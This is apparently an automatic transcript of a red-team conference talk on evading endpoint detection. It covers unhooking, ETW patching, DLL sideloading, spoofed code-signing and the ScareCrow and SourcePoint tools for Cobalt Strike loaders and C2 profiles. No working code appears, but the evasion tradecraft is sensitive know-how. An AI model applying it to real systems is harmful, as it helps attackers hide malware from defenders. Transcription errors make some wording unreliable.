 Hello and welcome to my talk Operation by path catch my payload if you can My name is Matthew. I'm a technical manager in Optiv Under the adversarial services. I have primarily a lead there that my role is focusing primarily on red teaming purple teaming Basically any type of adversarial real nation-state based attacks. I've also authored numerous open source tools and frameworks A lot of the research I've done It's been focused on evasion Bypasses and as well as circumventing EDR and other endpoint-based controls and security And the Microsoft Hall of Famer related to several disclosed Microsoft comm bypasses and I've spoken at numerous places including Def cons red team village derby con b-size Las Vegas your con RSA So just a brief overview of the agenda that we're going to cover today First we're going to understand the level of detection and look at some op-sec considerations and understand some TTPs for the modern era Then we'll focus in on using scarecrow a framework for bypassing endpoint detection tools and Then kind of drilling more into the indicators of compromise that can lead to a detection or any type of artifacts when we're talking about command and control services and then introduce a new tool to help with those C2 profiles So to begin I mean this is a fairly you know common diagram to kind of depict the red team life cycle Primarily, we're really going to focus in today once again on the C2 and all the aspects of it from Establishing that presence to making sure you don't get detected and to your long-term longevity that leads into eventually post-ex techniques But first let's kind of defined you know endpoint detection and response tools How do they actually detect us and you know subsequently prevent our attacks? Well, they primarily rely on a series of different combinations these days userland hooking being the most common Colonel callbacks using ETW events or the moniker of machine learning AI which I use that in quotes because a lot of times when we Get down to it. It's usually a signature base or a combination of the three with something else in the background Not to dispute that there is any value to machine learning AI was just oftentimes when We see this as a tool to prevent threats. It's usually something that is really Not selling the whole truth. And so there are a lot of misconceptions to it So with that in mind, how do we get around it? Well, the most common things have been process injection But with more recent events in the modern, you know landscape is going to things such as using custom system calls Using a technique called block DLS, which we'll kind of go into in a little bit But also more and more Undocumented API calls now. I've kind of Posted a link here for good buddy of mine He does amazing bit of research and he has a great project called alternative shellcode exec this really focuses on using alternative API calls and Kernel callbacks to basically execute shellcode that are not in the normal way and this kind of by nature allows us to Circumvent the normal detections and therefore establish a presence without being detected because these are alternative ways So EDRs and other tools are often not looking for these as a point to see if malicious activities being used So block DLS. This has been a very common and a great technique. This is essentially a technique where You can set your process to have a flag and this flag says hey only allow Microsoft signed DLS Which means that only system level DLL such as NT DLL Kernel kernel 32 these ones that they're all the only ones that are allowed to be loaded into our process Which means frankly that any type of EDR product can't load their DLL into our process to then subsequently detect our activity So their response to our attacks They've started you getting their DLL signed by Microsoft. Yeah, so this is a very effective way So that allows them to basically still load in even with that flag Deploying as a feature whitelisting controls Rather than the traditional black listing, but whitelisting where you block everything and only limit certain applications has been very effective as binary based attacks No longer work These whitelisting rules are often using hashes. So it's really hard to imitate a legitimate hash say of CMD with your implant And other kind of controls XDR This is just you know endpoints Detection tools way of gathering telemetry from different aspects rather than just the endpoint but looking at you know The network behavioral traffic what's egressing and activity between the hosts to determine You know baseline of malicious or suspicious activities such as you know WMI exact calls or anything along the lines that would lead to Techniques that an attacker would do or things that are out of the norm for that user Really heavily emphasizing the base lining of activity so Our response to their response So one of the things that you know, I kind of preaches with this data age of more and more people having their EDR DLL signed by Microsoft is just to avoid block DLLs as a whole especially for initial photo, but also for post-ex techniques There are a lot of great techniques that right now coming out of there as a replacement But this really kind of helps Prevent us from kind of being detected as this flag of my only signed Microsoft DLLs Isn't really standard across a lot of processes and when we're talking about trying to blend in that Flag itself can sometimes stick out as a sore thumb therefore kind of drawing more attention to our process Then we actually want it With regards to whitelist and controls We'll kind of talk a lot more about this But you know avoiding using power process injection in favor of a technique called Sideloading and we're going to get into that in a little bit But with regards to XDR controls, this is really where some of the interesting stuff about blocking or in memory patching of Etw events since Etw and other things like that are Organically built into the windows environment How these things work is when they're actually running they actually have to Basically start enabling the traffic and stuff. So there's no additional resources that are loaded So by patching and terminating or tampering with them. They don't send the right information. Therefore these controls don't really work And so this really comes down to the cat and mouse game and how do we get better and Really really at the end of the day really has to come down to how are we getting that alert? How our team's seeing us and it's sometimes not always the shellcode or the implants fault There is a lot of different phases that get to the point of that shellcode running That can often be the catalyst for the trigger and we really need to understand this chain of events in order to Identify where we need to improve in our tradecraft So when we look at it this the example or definition I like to run by is there's the delivery the loader and the implant the delivery is the mechanism that you're going to get your Here loader onto the box most commonly things like you know msh ta bits admin anything that allows you to download or pull from a remote or local resource Your code onto the desktop. So that's one area. The secondary is the loader itself So, you know, whether it be a binary a DLL, you know a J script file What have you this is the file that contains, you know You're implant as well as you know, whatever techniques you're going to introduce whether it be you know anti-sam boxing Anything for unhooking DLLs or like a decryption technique These are the things that happen inside this process before your actual implant will run I like to define the implant as the shellcode or you know and in cobalt strikes is the reflective DLL that runs in memory And that essentially is responsible for establishing that remote connection out So once we have these three things to find we need to understand what's detecting us So I like to break it down into two things behavioral Which is really coming down to EDRs So EDRs really like to focus in on that behavioral indicators I have the example up here of wise excel spawning cmd.exe that that's a behavioral thing But there's also signatureizing, you know as great as we look at it signatureize base such as like, you know The historical antivirus agents that's still it comes into play when they're detecting things like large block strings of base 64 or shellcode But what is the harder thing to understand and often is more of the more common reason that leads to an event is actually coming from something like a human interaction a sim or some kind of Sock tool that's monitoring for events This can be something like files being dropped in a location such as temp and then a process spawning from a weird location To something even more abnormal such as you know An alert that says hey, we're seeing a lot of egress to a new destination and tracing it back This is a conference room PC. So why is it calling it at three in the morning? These are all taken from, you know real-life Red team operations where there has been some kind of generated alert and you know the lessons here are really kind of some of them Are really simple you know tell more of a Convincing story, but other more technical that you have to apply more Technical advanced techniques to basically bypass that technical control So the detection These are the most common gotchas as I kind of mentioned I like to break them down to kind of four things to really focus in on when I'm developing an attack What is the command I'm executing so obviously, you know these days things like PowerShell or bits admin They're very highly indicated. There's been a lot of research. They're a very prominent lol bin So by focusing and using that there's a high chance that there is some kind of rule or type of mechanism out there That's looking for the execution of it now. There are a couple things you can do To kind of obfuscate that and that's really where you have to understand what you're going up against As well as being mindful of the file type Obviously if you're dropping if you're downloading from some random location a binary just straight There are going to be things that passes through web proxies and external kind of control and they can see it this large data stream and You know binaries have a universal header so it's easy to detect that so these are all things you have to be mindful of when you're setting up this attack chain Also for abnormal behavior. This one's a little harder to kind of discern But what I like to say is that you know if you're going to start using commands, you know, lol bins You have to understand who you are you are you someone that you know as a standard user Are you more as your user someone that would probably use this and you know if a security team is looking at They wouldn't bat an eye so it's really about blending in telling that story and finally whitelisting controls So when I talk about whitelisting controls, we have to really understand, you know, what's there? Oftentimes Your whole you have the greatest attack chain ever But if they block your ability to run something you'll never know it and especially in a black box situation Beacon may not come home your implant your C2 essentially won't fire and you don't know if that detection is So if I can leave you with one thing when we talk about detections, it's this Detections are really easy to trigger, but they are can be impossible to understand unless you have the ability to look at the alert and Understand what it's triggering on and sometimes that can only be done through life lessons and experience Now let's kind of talk about an example in a situation. We'll use cobalt strike C2 Let's say power shell scripted web delivery. So that would be a power shell script that you know remotely calls downloads establishes a beacon and This happens the beacon calls home calls home several times before the operator even executes a command The first command they run is who am I and all of a sudden the beacon stops calling home so Right now let's kind of take a look and follow this flow So we here we see you know the chain we see that you know CMD was used to spawn power shell something power shell was executed and then Who am I was the last process? When we look into it we see that first and foremost The power shell script while it was an event. They don't have enough information right here They believe there's something malicious and there has characteristics. So it's not confirmed They still need more data, you know, these EDR products don't want to you know Jump to the gun or terminate because it can actually impact business So they need the right information because if they're terminating everything like that, it cannot be used in an environment No one's going to use their product. So they need more data points to make that decision The next alert, okay, so now it's a bit more of a severity They see there's a base 64 encoded command and we and it appears to be malicious But there's not enough indicators right now for them to know what's going on because sometimes this could be a false positive And then the final one we see a recon command obviously who am I was used and with all this combined That's where this alert is so we see this breakdown It wasn't necessarily that the scripted web delivery was the catalyst It was simply enough behavioral indicators had been tripped for something to occur. So once again Oftentimes the implant ish. It cannot be the primary cause of the detection. It can sometimes be post-ex techniques and so when you are looking at this and you're establishing a Photo, you have to be also mindful of you know, just because you have this photo doesn't mean that you're free and the clear They're often secondary controls that can trigger that can lead to a preventative measure and a loss of a beacon So it's really important to understand Even if you're successful how you be how you were successful are there still stuff? Are you fully flying blind? Do they have enough information? Is there something they're waiting for? Even if you're using the latest techniques if you're using a very common, you know Catalysts like a delivery command that's highly indicated you can get caught really easily and thus those highly Undetectable techniques will never really be triggered or used I like to call this fruit from a poison tree because if they're already on to you for the first initial call once again Let's say PowerShell Everything subsequent is already suspect So going back to that event I want to kind of say who am I was just the tipping point There was enough information from there because from the behavioral instance Who am I stick to use as a recon and with everything in that attack chain? It was enough to discern and confirm that based on the fact that who am I was run that the PowerShell activity was indeed malicious and Why they did that it might be a question Why didn't they just instantly block PowerShell which is PowerShell as much as we use this so as legitimate Business uses for IT and administration. So by completely terminating it doesn't actually really work You need more points to make a decision. I like to also call out here as an offset consideration to avoid PowerShell at all cost Most of these days see sharp tools pretty much cover the gambit of everything. They see sharp is highly flexible It's easier to off you skates make it makes it harder for Luteans or even endpoint protection tools and mech anti-mower controls to detect this So if at all costs avoid using PowerShell because it's highly indexed and Kind of indicators of compromise are clearly defined so Some offset considerations when we're building out these attack chains as well as our implants So first and foremost, let's look at the implant itself So first I always say Encryption always use some sort of encryption the higher in the stronger the encryption the better Sometimes I have discussions and people ask well, what about you know, Bay 64 or something along those lines That's good, but it's by no means a replacement for encryption It's a great to use a combination especially when you're encrypting You know with AES or something like that the string and to basic seem foreign code It makes it easier to store in your file Your loader Now that being said the next issue becomes avoiding the strings This is often a common thing that you know Yara rules or any type of blue teams are looking for is you know For something to write a rule or some kind of trigger on so if they can find a static string or a value That's always gonna be the same They will use that as a catalyst to create their rule for detection This kind of place away from the EDR perspective into those sim stock all that type of stuff so I always like to say if you can make your Loader as more fake as it can be so each time you generate it's always gonna be different values The strings are gonna be different sizes and everything like that That just adds a level of entropy Making harder to see if you can kind of see here if you see in this example Yara we can see these ops and all these things if these are static values The answers are that it when that triggers the will be an alert also If you can if depending how fluid or your comfortability in using uncommon languages is a great way to add a layer of Obtuscation to your loaders, you know the most common ones these days for tooling a C sharp C plus plus But looking things like go lang rust F sharp can be very valuable as just a natural way of office gating So offset considerations when we're talking about a loader So this is where it becomes very much an art form and situational So the key thing here is to understand, you know your environment. What are you targeting? What controls do they have? Is there something that you know could just not execute in that environment for a specific reason? More so to the point, you know, what are the products everything like that? Is it a thin client? Is it the end point that you're targeting? Is it like a limited box? Everything like that? if you're gonna, you know use some kind of Calm agent or something like that are those calm things that they're related to you know outlook or word They might not exist on the server. So those are things you need to be mindful of other things Can be you know the file name if your file name stands out is something very suspicious That's that's like one major thing If it looks more like a like a program than it would be found in enterprise that kind of makes it easier to tell that story Once again to blend in as well as going deeper looking at the metadata of it the attributes You don't want your home computer or your own personal name in the metadata And that all kind of stems down to how does it look on disk? if it's just a weird size but a weird binary or something really weird sitting on the desktop on You know a laptop someone's laptop. They might see this as well as you know Where you're executing from if you're once again executing from temp or app data? It might it could be suspicious enough that it would warrant investigation I called this up before but you know strings base 64 large strings is a very easy way and Microsoft Is becoming more adept into looking for files that have large basic base 64 strings by breaking them up You add it makes it harder for the discern that oh this is this is definitely something it's suspicious because there's this large string of code And as always binaries I don't mean to beat up on them a lot, but binaries are really easy to detect That's why you know looking at and we're going to talk about it right now looking at new ways to basically Load shellcode into memory so on to the tactics techniques procedures for this modern era We talked about this a little bit, but side loading This is becoming more and more prevalent Threat groups around the world are trying to use this technique more and more in favor of traditional things like binaries or even process injection attacks this technique is as simply the act of loading your DLL Into a program at a legitimate program of that in a malicious way So how this can be is you know a good example can be with CPL files where when they are executed if you execute your malicious CPL file It will spawn run DLL which is managed which is responsible for the control panel CPLs or control panel applets so When you execute that binary that CPL I should say It will spawn a run DLL process and that process will then load if it has the proper export functions that CPL file Into memory and execute it So what does that look like it looks like run DLL a legitimate Process is loading something in you see this a lot with you know red server 32 as well with the LLs But it basically circumvents in a lot of times whitelist and controls because these are native to the windows operating These are things that are allowed These are part of this is they're not selling for it. So they're often whitelisted There's many of them different types of silos. I just use run DLL and register as the most common ones out there But what's great about these is once they're loaded in Your loader way that drops any type of dropper that drops that DLL or CPL, which whatever catalyst you're using You can remove it and clean it up. So that way the process is there It's running in memory and how you got it onto disk how you got everything you set up Can be cleaned away and it's very effective So now let's talk about scarecrow scarecrow is a framework I developed That actually performs a lot of the kind of techniques. We've been talking about so first and foremost Using custom system calls. It actually will reload NT DLL kernel base and kernel 32 flushing out the EDR is user land hooks in it So there won't be any hooks It also Encrypts the shellcode in an AES format It patches ETW so that way there's no telemetry and it actually goes a step further net and uses an Alternative way to execute shellcode that's not standard. So everything we've just kind of talked about it's built in this framework What it also does is those loaders those files, whether it be a binary a DLL Jscript file it it spoof the attributes of ones that are legitimately found on the windows environments You know ranging from cmd.exe Word.exe to live crypto DLL all these values as well as allows you the ability to valley code sign By actually spoofing the attributes of a domain for a code signing cert I've provided a link and I'll provide it at the end To the framework, but talking about the loaders There are several different ones here and I've kind of listed them out. So Primarily, it's still does use binaries. There is a place still in the world for binaries But the control the DLL the Excel MS exact and W script. These are all techniques to sideload so we already kind of talked about control and DLL but the DLL is very Polymorphic it can be used for anything It just generates a DLL and you can use it with any type of attack or you know exploit a Excel it actually will Create an Excel plugin once again with valid attributes and a code signing cert And then uses Jscript to actually spawn Excel in the background and load this plug-in in to memory in a sideloading technique We recently added MSI exec this creates an MSI exec process and loads once again that DLL into memory In W script it uses a technique called registration free calm Which takes a manifest file and says this manifest cell says hey You need to load this DLL into memory and it provides the attributes everything of what it needs to do So it will look for that DLL which is our malicious DLL and then load it into memory Now because sideloading become so prevalent And as again, you know threat actors are using this in the wild more and more EDRs are trying to combat this so you can kind of see right here. There was a malicious module loaded You know, they rank this as a high, but what are they actually looking at? This is a really hard thing to kind of detect and stop So, you know Simply put sometimes what from my investigations Looking at it when they are looking at it. They look for some abnormal module behavior being occurring in the process What does that mean? sometimes it can be as simple as Then two DLLs were loaded at the same time with the same name Just by changing it There's no trigger anymore. There's no alert So it really comes down to that this technique is very valuable and really hard to detect As such Scarecrow does ensure that the DLL names that it does load in for W script Excel Run DLL control panels They're not DLLs you're ever going to see in those processes. So this alert never will be triggered So I wanted to provide some tips using this framework. So the first one is the loader flag This flag actually stipulates what type of loader you're going to make as far as we kind of talked about side loading Loaders are way better than binary Base loaders. This is simply because they can bypass whitelisting controls If you don't fill this in it will by default fill it in as binaries and that might break your success So always ensure that you know what you're using. Don't just use the default DLLs like I said, they have their place They're really it's really versatile so it can be used with pretty much any type of attack if you have a Metasploit module or anything along those lines or maybe an Another exploit where it needs a DLL as a catalyst for your implant. This is where that feature really comes into play The next one is the domain flag this flag Basically determines the domain you're going to use to spoof the code sign search now If you do have a valid code sign you can enter it along with the password and it will actually use that to validly code sign it One thing and it's a very common thing that I get asked is you know Sometimes it doesn't work. You can't reach out it's stalled when trying to sign That's sometimes because wherever you're creating your loader It needs to be able to reach out to that domain So if they're if it you're coming from a host has no access to that domain name or that domain doesn't actually exist That can be a problem One of the biggest things I always want to stress to people is that when you're actually choosing the domain never use the company's domain Very few companies unless they're a big tech company that actually has a code sign So they they use software or anything like that They're typically not going to have a code signing cert and therefore they're typically not going to whitelist it in their own EDR products Already across their enterprise so stick to things that are more common in the enterprise You know you everyone has networks such as everyone uses windows everyone uses You know those are the things that are going to give you a higher success rate when you're picking a domain Next thing is the delivery command. This is what we talked about. This is very very very dependent on what you're facing Like I've been saying, you know, LOL bins are great But there's also they also come with a high chance of detection. So there's a double-edged sword The way I kind of tell people is that you know, HDAs are good, but macros and calm objects. They're better You know everyone has there's always the once again that fluid it depends on the environment So the more information you get from your recon everything like that will really tell you which one will work better It's never going to be that this one's always the best It's always going to be this one is the best for this situation and that situation can change client to client network to network enterprise Emperor security sector security stack You really want to then focus in on the user behavior I like to always say, you know Sally from accounting does not know how to use your tail So if you're trying to pretend to be Sally, maybe you tell is probably not the best thing for you to do Maybe it might be a different way And I mean sometimes it can be as easy as if you have you know an RDP based access It's next to impossible for any product to detect, you know a mouse and keyboard clicks It's no way to describe that, you know Once again, this is Sally's clicks and keyboard actions versus my me as a malicious attacker So when you're thinking about it, it really comes down to that story and what you have access to the more You have the better the story is I Also wanted to provide some sample, you know commands to get you know, the ideas going so here we have The first one is just creating a signed binary With ETW bypassing That's the first option Second option is a J script. The J scripts are ones who are usually my favorite. They're my go-to J script is really great to kind of get through those network controls and land on this environment So you see right here with the domain flag and the loader set to control with dash o Then finally the last one W script now W script is my go-to loader just with that manifest file It's very powerful and really hard to detect But it might not be yours. You might depending on once again on the situation It might be something better of a different loader Always keep that in mind when you're looking at these situations so Here we have a little example We have our loader.js and it's going to spawn And if you can see in the private bytes you can see that value is going up Because our DLL is being side loaded into the process and once it's finished we'll start executing it will unhook All those DLLs then decode the shellcode using custom system calls once that happens it will use a different way to execute giving us our remote shell Here we can then enter commands Without being detected So now let's talk indicators of compromise What are they simply put they are pieces of or artifacts that can help identify malicious activity This can be you know related to attacks post-ex Techniques, you know data breaches or even infectious malware that we drop on environments Uh As our attacks become more advanced in this age IOCs are becoming more and more relied on to look for this is that transition away from relying solely on An anti malware controller and EVR product to solely be your sole point But that layered approach where you have a sim or a sock analyzing all this stuff To ensure that the behavior or anything that's dropped or anything that happens is then correlated to behavioral or known attack techniques and We should care about this because this is how the game is changing as we look at it Fenders are learning from us. They're they're in our they're coming to our talks. They're they're reading our research They're they what they're following whenever we come up with new techniques and then trying to figure a signature to detect it And as we modify this so do the IOCs So if we are constantly evolving our tradecraft We are circumventing those predefined IOCs that they're looking for and once again that can mouse game is occurring And simply put if we can do that further by extent by modifying how our c2 interacts Uh, that's a great step ahead and keeping them always keeping us always one step ahead of them and Simply put threat actors are doing this with huge success So I'd like to give an example using cobalt strike You know c2 profile that didn't have beacon.dll stripped out Fishing email that contained a payload when the user opened the file and enabled the macro the shellcode executed. It's great The beacon called home, but anytime The command was executed The edr would block the payload by simply stripping things out such as beacon beacon x64 out of the profile and retrying again The edr did not catch on To this because it couldn't It wasn't a look it was looking for this and didn't see beacon.dll in memory. Therefore it didn't have enough Points of data to make the discerned decision to terminate the process That's just one example of what we can do for our c2 to manipulate it to avoid detection another one once again looking at those human That human aspect User agent strings now this only comes into play, you know, if you're using dns based beacons, you don't really need to worry about a user agent Um, also while we're on the subject Really good to avoid using tcp over the internet. Um It's very odd it sticks out if you're going across the internet. HTTPS is the best But oftentimes the user the agent string can be a dead giveaway if it's something that's odd or weird Or doesn't look normal Sometimes that's an indication that there needs to be something to investigate More mature companies can go as specific as looking at well We're a firefox shop and then one day they start seeing internet explorer user agent strings that stands out from the crowd And that's can be the point of an ioc that they can start investigating on So with all of this in your mind let's introduce a new tool i'll be releasing today called source point Source point is a tool that actually generates malleable c2 profiles for cobalt strike Uh, talking using all these features. We kind of talk to it and more It really ensures that each time you generate a profile regardless if you put the same values in The actual profile itself will be unique so you can generate multiple profiles using the same values and they'll be unique from each other There's over 15 different customization options in this tool alone for you to select But if you choose to use leave them blank that we randomly selected for you So you're always ensuring, you know a high level of entropy It does you know 15 Options can seem daunting. So there is yaml support. So it's really good to use a yaml file So you can always have kind of like your go-to sampling that you can start modifying it is written go but it's simply using a template based language to generate these uh profiles So some of the features it has as I mentioned before by that user agent strength There's over 60 ranging from windows 10 windows 10 chrome windows 10 i.e firefox server mac Linux you get you kind of get this in the picture. So there's a lot of them also different options for p-header There's over 21 currently built into it. There are seven different types of profiles for your traffic to be shaped to um In right now it does strip out 95 strings that you know edr is used to look and detect shellcode Especially around your cobalt strike. You can kind of see right here a large list of them Now usually the question I get is well, there's options to obfuscate and encrypt. So why would I bother with this? oftentimes All that stuff gets down to the point that it's a great way to avoid detection But at some point it needs to be read and interpreted by the The system so it has to be in an unencrypted state for it to be processed on the stack properly And that's when those detection over alerts can be triggered. So that's why going through this I've looked through and it's found the common Indicators of compromise looking for commonalities and things that they would look for and just removing them Um, as I mentioned before there is a lot of ram realization. So the values for allocations on different features are always changing Obviously, there's you know sleep jitter, you know, you're kind of standard things But more interesting thing is the manipulation of injection based strings for post-ex. There's even 18 options Um, I like to also call we can kind of see right here. This is a great Document or an image if you haven't had a chance, please look go ahead look at this It is basically a parent relation process map of normal windows processes And they're parented child processes. So with this when we're talking about, you know Post-ex or any type of spawn two processes, especially like execute assembly. We can actually map process with a More realistic child process for spawning and it makes sense and it's harder just to detect and it doesn't stand out as much Uh, this right this tool source point has cdn support for anything that you need for cdn Depending on how you're setting up your your c2 as well as allocation manipulation values also supports ssl certificates So why use it? Uh, it's been development for several years. It's been deployed on hundreds of red team ops prior to today's public release Uh, the most important thing I would probably say is unique profiles if you're taking something That is static or using something that's the same profile over and over again for multiple engagements Uh, eventually if you're going to get caught burnt Um, especially if it you're basing it off as something that's public and you're not really modifying it extensively chances are other people are downloading it and doing the same thing. So having completely unique profiles really does aid and once again keeping one step ahead of blue teams another reason is it automates the process And reduces the basically overhead of building and stripping out these iocs from your c2 Uh, my personal favorite is human error, you know people make mistakes. I I often make them That's why I developed this is that way I can do it once and have it automate it Uh, so I couldn't show an example template because they just run off the screen We can be here for hours going through all the different features Uh, but to kind of show you what the results are from c2 in it You can kind of see right here how it looks all the different features what it's done the transformations everything like that The values and how it just really blends in So my final thoughts before we wrap up, um We really need to as red teamers Understand blue teams and their procedures better from that we can understand how they're detecting us What we can do to go around those detections Uh, simply blue teamers are attending our talks. They're reading our research every time we publish something They're reading it. They're learning it so that way they can, you know fine tune their tradecraft to be better at detecting it So we really need to do that and that's how this cat and mouse game is going to work and continuously keep uh continue Lastly at the end of the day for us to be better red teamers. We need to start learning blue So any questions, um, you can find the scarecrow framework for bypassing edrs and all that stuff for developing implants um here Source plan can be found on my github along with the slides If you have any questions or ever want to talk about the stuff, you know, I this this is my passion my bread and butter I really spend a lot of free time Doing this and learning and kind of advancing my own tradecraft So if you ever have a question I want to talk feel free to reach out to me my twitter github Before I wrap up today. I just want to say thank you for attending my talk Have a great day